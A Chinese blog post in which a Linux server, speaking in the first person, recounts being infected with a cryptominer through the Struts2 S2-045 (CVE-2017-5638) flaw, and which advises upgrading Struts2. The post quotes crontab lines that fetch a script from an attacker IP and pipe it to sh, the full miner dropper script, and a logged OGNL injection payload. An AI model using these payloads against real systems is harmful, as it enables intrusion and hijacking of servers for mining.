我竟然被抓去做了比特币挖矿工

版权声明：作者： 小柒 出处： https://blog.52itstyle.com 分享是快乐的，也见证了个人成长历程，文章大多都是工作经验总结以及平时学习积累，基于自身认知不足之处在所难免，也请大家指正，共同进步。 https://blog.csdn.net/zhulin2012/article/details/78240034

引言

世界上还是牛人多，在2011年的时候，一名大三的学生有了困扰，随后上知乎发布了一个提问大三学生手头有6000元，有什么好的理财投资建议?在2017年的今天，上到了知乎热门提问，因为在提问下面有一个获得上万点赞的回答买“比特币，保存好钱包文件，然后忘掉你有过6000元这回事，五年后再看看。

起因

我是一个服务器，并且还是一个内网的Linux服务器，外面武装了天清汉马防火墙，内部有firewall，强大的密码组合，甚至自己都记不清到底几位数，这几年我甚是悠闲，悠闲的感觉自己有点混日子，然就是这样一个与世无争的我还是被无情的攻击了。

那天清晨，感觉大脑有点发烧，赶紧发出一条top指令：

1. top - 20:07:49 up 70 days, 8:53, 2 users, load average: 5.71, 5.07, 2.93
2. Tasks: 200 total, 1 running, 199 sleeping, 0 stopped, 0 zombie
3. %Cpu(s): 50.2 us, 0.1 sy, 0.0 ni, 49.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
4. KiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache
5. KiB Swap: 32834556 total, 32803700 free, 30856 used. 51442368 avail Mem
6. PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
7. 17257 root 20 0 591340 15220 556 S 599.7 0.0 67:13.74 atd
8. 15768 root 20 0 15.369g 2.319g 18048 S 1.7 3.7 4:10.49 java

发现了一条诡异的进程atd，CPU占用居然将近600%，执行命令ps -eaf|grep atd：

1. [root@itstyle tmp]# ps -ef|grep atd
2. root 17257 1 99 19:56 ? 01:22:31 ./atd -c trtgsasefd.conf -t 6
3. root 17475 17165 0 20:10 pts/0 00:00:00 grep --color=auto atd

紧接着find / -name atd查找相关指令存放地点。

1. [root@itstyle tmp]# find / -name atd
2. /var/tmp/atd

突然觉得还是先把这个atd进程杀掉为好，kill -9 17257，立即马上迅速强行杀死。

随后退烧了，但可恶的是，不到几分钟，又烧了，一看又是atd这个进程在运行。

杀掉后重新运行，一定是在某个地方有定时，检查了一下定时任务，crontab -l：

1. [root@itstyle tmp]# crontab -l
2. */20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh
3. */19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh

擦，以前的定时脚本不见了，多了两条奇怪的任务，里面有个网址很特别，复制到浏览器访问，本以为是个美女或者惊悚图，结果是个大黑图，F12图片网络请求发现Response中居然存在如下代码：

1. #!/bin/sh
2. rm -rf /var/tmp/bmsnxvpggm.conf
3. ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
4. ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
5. ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
6. ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
7. ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
8. ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
9. ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
10. if [ $? -ne 0 ]
11. then
12. echo "start process....."
13. chmod 777 /var/tmp/trtgsasefd.conf
14. rm -rf /var/tmp/trtgsasefd.conf
15. curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
16. wget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
17. chmod 777 /var/tmp/atd
18. rm -rf /var/tmp/atd
19. rm -rf /var/tmp/sshd
20. cat /proc/cpuinfo|grep aes>/dev/null
21. if [ $? -ne 1 ]
22. then
23. curl -o /var/tmp/atd http://5.188.87.11/icons/kworker
24. wget -O /var/tmp/atd http://5.188.87.11/icons/kworker
25. else
26. curl -o /var/tmp/atd http://5.188.87.11/icons/kworker_na
27. wget -O /var/tmp/atd http://5.188.87.11/icons/kworker_na
28. fi
29. chmod +x /var/tmp/atd
30. cd /var/tmp
31. proc=`grep -c ^processor /proc/cpuinfo`
32. cores=$((($proc+1)/2))
33. nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
34. else
35. echo "runing....."
36. fi

一坨脚本，狗日的 居然有 rm -rf 这是要要了老子的命啊！！！ 吓大赶紧打开蓝灯谷歌搜索这个命令，在virustotal找到以下说明:

同时发现了一条四天前的评论，这是一个脚本，通过struts漏洞传播下载和启动一个bitcode矿工。

在gov.lk中也发现了有一坨代码，隐约发现与struts2有关：

由于一些老旧项目还在使用struts2，于是查询了一下相关日志，居然发现了传说中的OGNL注入

1. org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

黑客攻击者通过使用一个表单来发送一些内容到struts请求，该内容被OGNL解析，结果创建了crontab，擦，真是耳闻不如一见啊，也有中招的那一天，就这样我变成了一个苦逼的挖矿工。

挖矿组织

Struts2的安全漏洞从2010年开始陆续被披露存在远程代码执行漏洞，从2010年的S2-005、S2-009、S2-013 S2-016、S2-019、S2-020、S2-032、S2-037、devMode、及2017年3月初Struts2披露的S045漏洞，每一次的漏洞爆发随后互联网都会出现Struts2扫描攻击活动。

此次攻击针对Struts2的远程命令执行漏洞，漏洞编号:S2-045，CVE编号:CVE-2017-5638，官方评级为高危，该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下，恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞，黑客通过批量对互联网的WEB应用服务器发起攻击，并下载恶意脚本执行下载进行比特币挖矿程序，主要感染Linux服务器。

经检测和搜索，这应该是一个有组织有纪律的挖矿集团，以下是IP地址来源，万恶的苏修主义啊，真是亡我天朝之心不死。

解决方案

Struts2升级版本至2.5.10，高危漏洞又来了，这是三月份的一篇升级，当时投机的还是赶紧升了吧，如果实在不想升级，无所谓反正是挖矿，不会破坏你什么。

但是，如果不挖矿呢，那就傻逼了？到时候就不是发烧那么简单了，很多公司上线部署都不是很规范，可能所有的程序都用root启动也说不定呢？

如何注入

最后感觉这才是大家比较关注的问题，肯定有不少小伙伴想知道黑客是怎么注入的吧？

人们都说，只要心够诚，就能在西边疙瘩山上寻得一当铺，进去，便能改变你的一生，其实我也不知道。